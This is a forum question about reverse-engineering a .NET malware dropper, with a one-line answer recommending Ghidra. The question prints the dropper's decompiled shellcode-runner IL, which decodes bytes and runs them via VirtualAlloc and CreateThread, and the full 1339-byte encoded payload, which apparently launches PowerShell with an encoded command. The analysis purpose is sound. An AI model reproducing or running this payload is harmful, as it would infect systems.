How can I disassemble the second payload of this malware dropper?

Question

I am currently reverse engineering a piece of .NET PE malware that drop shellcode using the CreateThread function and a block of data.

This is the shellcodeRunner function as decompiled by monodis (im on linux)

    .maxstack 6
    .locals init (
        unsigned int8[] V_0,
        int32   V_1,
        native int  V_2,
        int32   V_3)
    IL_0000:  ldstr "[+] Running shellcode..."
    IL_0005:  call void class [mscorlib]System.Console::WriteLine(string)
    IL_000a:  ldc.i4 1339
    IL_000f:  newarr [mscorlib]System.Byte
    IL_0014:  dup 
    IL_0015:  ldtoken field valuetype '<PrivateImplementationDetails>'/'__StaticArrayInitTypeSize=1339' '<PrivateImplementationDetails>'::34D84C3D147ABF5A05B8FF8851822AACADD1A91EBDE633F0C7C82779CCC23977
    IL_001a:  call void class [mscorlib]System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(class [mscorlib]System.Array, valuetype [mscorlib]System.RuntimeFieldHandle)
    IL_001f:  stloc.0 
    IL_0020:  ldc.i4.0 
    IL_0021:  stloc.3 
    IL_0022:  br.s IL_0037

    IL_0024:  ldloc.0 
    IL_0025:  ldloc.3 
    IL_0026:  ldloc.0 
    IL_0027:  ldloc.3 
    IL_0028:  ldelem.u1 
    IL_0029:  ldc.i4.2 
    IL_002a:  sub 
    IL_002b:  ldc.i4 255
    IL_0030:  and 
    IL_0031:  conv.u1 
    IL_0032:  stelem.i1 
    IL_0033:  ldloc.3 
    IL_0034:  ldc.i4.1 
    IL_0035:  add 
    IL_0036:  stloc.3 
    IL_0037:  ldloc.3 
    IL_0038:  ldloc.0 
    IL_0039:  ldlen 
    IL_003a:  conv.i4 
    IL_003b:  blt.s IL_0024

    IL_003d:  ldloc.0 
    IL_003e:  ldlen 
    IL_003f:  conv.i4 
    IL_0040:  stloc.1 
    IL_0041:  ldsfld native int [mscorlib]System.IntPtr::Zero
    IL_0046:  ldloc.1 
    IL_0047:  ldc.i4 12288
    IL_004c:  ldc.i4.s 0x40
    IL_004e:  call native int class dropper.Program::VirtualAlloc(native int, int32, unsigned int32, unsigned int32)
    IL_0053:  stloc.2 
    IL_0054:  ldloc.0 
    IL_0055:  ldc.i4.0 
    IL_0056:  ldloc.2 
    IL_0057:  ldloc.1 
    IL_0058:  call void class [mscorlib]System.Runtime.InteropServices.Marshal::Copy(unsigned int8[], int32, native int, int32)
    IL_005d:  ldsfld native int [mscorlib]System.IntPtr::Zero
    IL_0062:  ldc.i4.0 
    IL_0063:  ldloc.2 
    IL_0064:  ldsfld native int [mscorlib]System.IntPtr::Zero
    IL_0069:  ldc.i4.0 
    IL_006a:  ldc.i4.0 
    IL_006b:  call native int class dropper.Program::CreateThread(native int, unsigned int32, native int, native int, unsigned int32, unsigned int32)
    IL_0070:  ldc.i4.m1 
    IL_0071:  call int32 class dropper.Program::WaitForSingleObject(native int, int32)
    IL_0076:  pop 
    IL_0077:  ret 
    } // end of method Program::shellcodeRunner

And this is the shellcode presumably passed to the shellcodeRunner function.

.data D_000032e4 = bytearray (
     FE 4A 85 E6 F2 EA C2 02 02 02 43 53 43 52 54 53
     58 4A 33 D4 67 4A 8D 54 62 4A 8D 54 1A 4A 8D 54
     22 4A 8D 74 52 4A 11 B9 4C 4C 4F 33 CB 4A 33 C2
     AE 3E 63 7E 04 2E 22 43 C3 CB 0F 43 03 C3 E4 EF
     54 43 53 4A 8D 54 22 8D 44 3E 4A 03 D2 8D 82 8A
     02 02 02 4A 87 C2 76 69 4A 03 D2 52 8D 4A 1A 46
     8D 42 22 4B 03 D2 E5 58 4A 01 CB 43 8D 36 8A 4A
     03 D8 4F 33 CB 4A 33 C2 AE 43 C3 CB 0F 43 03 C3
     3A E2 77 F3 4E 05 4E 26 0A 47 3B D3 77 DA 5A 46
     8D 42 26 4B 03 D2 68 43 8D 0E 4A 46 8D 42 1E 4B
     03 D2 43 8D 06 8A 4A 03 D2 43 5A 43 5A 60 5B 5C
     43 5A 43 5B 43 5C 4A 85 EE 22 43 54 01 E2 5A 43
     5B 5C 4A 8D 14 EB 59 01 01 01 5F 4A BC 03 02 02
     02 02 02 02 02 4A 8F 8F 03 03 02 02 43 BC 33 8D
     71 89 01 D7 BD E2 1F 2C 0C 43 BC A8 97 BF 9F 01
     D7 4A 85 C6 2A 3E 08 7E 0C 82 FD E2 77 07 BD 49
     15 74 71 6C 02 5B 43 8B DC 01 D7 72 71 79 67 74
     75 6A 67 6E 6E 30 67 7A 67 22 2F 67 72 22 64 7B
     72 63 75 75 22 2F 67 70 65 22 4C 43 44 35 43 49
     4F 43 4B 43 43 3B 43 45 43 43 59 79 44 56 43 4A
     6D 43 65 79 44 32 43 49 57 43 64 53 43 77 43 47
     36 43 5C 53 44 32 43 45 36 43 58 79 44 6E 43 49
     4B 43 53 79 44 75 43 49 6D 43 5C 53 44 77 43 4A
     53 43 5A 53 43 38 43 46 71 43 64 69 44 6E 43 4A
     65 43 4D 43 43 72 43 46 75 43 4B 43 43 6D 43 4A
     53 43 5B 53 44 7B 43 49 65 43 5C 53 44 32 43 4A
     57 43 65 69 44 75 43 45 43 43 52 53 43 69 43 45
     65 43 63 43 44 32 43 4A 53 43 65 43 44 7C 43 46
     71 43 4E 79 43 78 43 49 69 43 5C 53 44 7B 43 49
     47 43 64 69 44 7C 43 49 3A 43 64 53 44 35 43 49
     47 43 65 69 44 6E 43 45 36 43 64 69 44 75 43 45
     3A 43 64 43 44 7C 43 49 53 43 63 79 44 6A 43 49
     5B 43 63 69 43 36 43 49 5B 43 63 69 44 6A 43 49
     5B 43 4F 69 43 7C 43 46 6D 43 51 43 44 6F 43 4A
     57 43 64 43 44 7C 43 49 53 43 4E 79 44 6E 43 4A
     5B 43 63 53 44 75 43 45 36 43 66 43 44 36 43 4A
     53 43 4C 79 43 39 43 45 53 43 65 43 44 33 43 49
     4B 43 64 43 44 72 43 4A 4F 43 63 43 44 6E 43 49
     53 43 55 43 44 6A 43 4A 4F 43 63 43 43 69 43 46
     32 43 4B 43 43 70 43 47 57 43 54 69 43 33 43 46
     6D 43 53 69 43 37 43 47 57 43 51 53 44 48 43 46
     47 43 4F 43 43 7A 43 47 5B 43 54 53 44 47 43 46
     4B 43 4F 69 43 7A 43 46 57 43 4F 43 44 47 43 46
     4F 43 51 43 43 7C 43 46 4B 43 53 53 43 7A 43 46
     4F 43 50 53 44 46 43 47 5B 43 4F 69 43 79 43 46
     4B 43 53 53 43 32 43 47 5B 43 50 79 43 34 43 46
     53 43 53 69 43 7A 43 47 5B 43 50 53 44 44 43 46
     53 43 53 79 44 44 43 46 57 43 53 79 44 45 43 47
     57 43 50 69 43 34 43 46 65 43 53 69 43 79 43 46
     47 43 50 43 44 45 43 46 47 43 53 69 44 48 43 46
     57 43 4C 79 43 39 43 45 43 43 4C 43 44 49 43 49
     6D 43 64 43 44 6E 43 47 69 43 5B 53 44 7C 43 49
     69 43 4B 43 43 3B 43 45 43 43 54 79 44 6E 43 4A
     53 43 4E 53 44 49 43 49 6D 43 64 43 44 6E 43 47
     69 43 5B 53 44 7C 43 49 69 43 4B 43 43 76 43 47
     6D 43 64 69 44 79 43 4A 57 43 66 43 44 56 43 4A
     53 43 65 69 44 6E 43 49 47 43 64 53 43 69 43 45
     69 43 4C 43 44 35 43 49 4F 43 4E 69 44 52 43 4A
     43 43 5C 53 44 77 43 48 4B 43 5C 53 44 6A 43 49
     53 43 4D 43 43 6D 43 4A 53 43 5B 53 44 7B 43 49
     65 43 5C 53 44 32 43 4A 57 43 65 69 44 75 43 45
     6D 43 4D 53 43 39 43 45 43 43 55 53 44 6F 43 45
     43 43 4D 43 43 6D 43 47 5B 43 63 53 44 75 43 49
     57 43 55 43 44 6A 43 4A 4F 43 63 43 43 77 43 47
     69 43 5B 53 44 7C 43 49 69 43 4B 43 43 76 43 49
     57 43 65 53 43 69 43 45 53 43 65 43 44 33 43 49
     4B 43 64 43 44 72 43 4A 4F 43 63 43 44 6E 43 49
     53 43 55 43 44 6A 43 4A 4F 43 63 43 43 72 43 45
     43 43 67 79 44 4C 43 47 57 43 59 43 43 71 43 45
     53 43 66 79 44 6C 43 45 36 43 54 43 44 78 43 4A
     65 43 64 69 44 75 43 49 3A 43 5B 53 44 6D 43 48
     4F 43 66 43 44 7B 43 49 6D 43 64 69 44 70 43 45
     69 43 4C 43 44 32 43 49 47 43 65 69 44 70 43 49
     57 43 66 43 44 33 43 4A 4B 43 64 43 43 72 43 45
     6D 43 68 53 43 69 43 47 57 43 64 43 44 7C 43 49
     57 43 4B 43 44 39 43 48 65 43 65 69 44 72 43 4A
     53 43 5C 53 43 76 43 47 69 43 64 79 44 7C 43 4A
     53 43 4B 43 44 64 43 45 32 43 5A 53 43 69 43 47
     4F 43 64 79 44 33 43 49 79 43 5C 43 43 69 43 49
     36 43 64 79 44 32 43 45 43 43 5B 79 44 78 43 49
     36 43 64 69 44 6E 43 49 4F 43 66 43 43 69 43 4A
     65 43 63 53 44 32 43 49 69 43 4B 43 43 6D 43 4A
     53 43 5B 53 44 7B 43 49 65 43 5C 53 44 32 43 4A
     57 43 65 69 44 75 43 4A 32 43 02) // size: 1339

What tool could I use to disassemble the instructions contained in the data. Running monodis on the data only does not work, as it contains no header table of its own. Is there any 'force' parameter to monodis that allows it to still disassemble the data?

Any help on this matter would be much appreciated.

Answer 1

I was able to disassemble the data portion by selecting and right-clicking > disassemble in Ghidra. Thanks to Dai for the insight.